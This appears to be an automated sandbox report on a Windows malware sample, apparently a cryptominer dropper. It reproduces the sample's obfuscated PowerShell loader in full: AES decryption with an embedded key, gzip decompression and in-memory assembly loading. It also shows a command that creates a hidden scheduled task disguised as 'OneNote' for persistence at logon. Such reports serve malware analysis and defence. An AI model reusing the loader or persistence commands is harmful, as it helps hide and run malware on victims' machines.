    Source: powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000007.00000002.1745848773.0000021780F42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.0000021520B53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF176D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBB94D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D01587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000007.00000002.1760886154.0000021790092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.0000021781C1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.00000217802E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1760886154.00000217901C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
    Source: powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

    System Summary

    barindex
    Very long command line found
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2195
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2215
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2195Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2215
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A35C300: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A35C300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A35F9400_2_00007FF65A35F940
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A37B1100_2_00007FF65A37B110
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A37CE080_2_00007FF65A37CE08
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A355E2C0_2_00007FF65A355E2C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A371EA00_2_00007FF65A371EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3734040_2_00007FF65A373404
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36A46C0_2_00007FF65A36A46C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3648E80_2_00007FF65A3648E8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3806D40_2_00007FF65A3806D4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A388B9C0_2_00007FF65A388B9C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36BB4C0_2_00007FF65A36BB4C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A372CD80_2_00007FF65A372CD8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A361A000_2_00007FF65A361A00
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A38FA140_2_00007FF65A38FA14
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A372A300_2_00007FF65A372A30
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A395A780_2_00007FF65A395A78
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A351AA40_2_00007FF65A351AA4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A374B180_2_00007FF65A374B18
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A365B200_2_00007FF65A365B20
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3920000_2_00007FF65A392000
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36F1000_2_00007FF65A36F100
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3806D40_2_00007FF65A3806D4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A378D740_2_00007FF65A378D74
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36AED40_2_00007FF65A36AED4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3753700_2_00007FF65A375370
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3924D00_2_00007FF65A3924D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36B4F00_2_00007FF65A36B4F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3721500_2_00007FF65A372150
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3612240_2_00007FF65A361224
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3572880_2_00007FF65A357288
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A35A2FC0_2_00007FF65A35A2FC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A35C3000_2_00007FF65A35C300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A38C7B80_2_00007FF65A38C7B8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3548400_2_00007FF65A354840
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3889200_2_00007FF65A388920
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A36C9280_2_00007FF65A36C928
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3738E40_2_00007FF65A3738E4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A35A6640_2_00007FF65A35A664
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3576C00_2_00007FF65A3576C0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA16E207_2_00007FFD9BA16E20
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA1C93B7_2_00007FFD9BA1C93B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BA1ED057_2_00007FFD9BA1ED05
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B9F407013_2_00007FFD9B9F4070
    Source: classification engineClassification label: mal84.evad.mine.winEXE@40/31@1/0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A35B6E8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF65A35B6E8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF65A3785A4 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF65A3785A4
    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6975453Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4076:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kr5pungr.4m2.ps1Jump to behavior
    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeReversingLabs: Detection: 21%
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
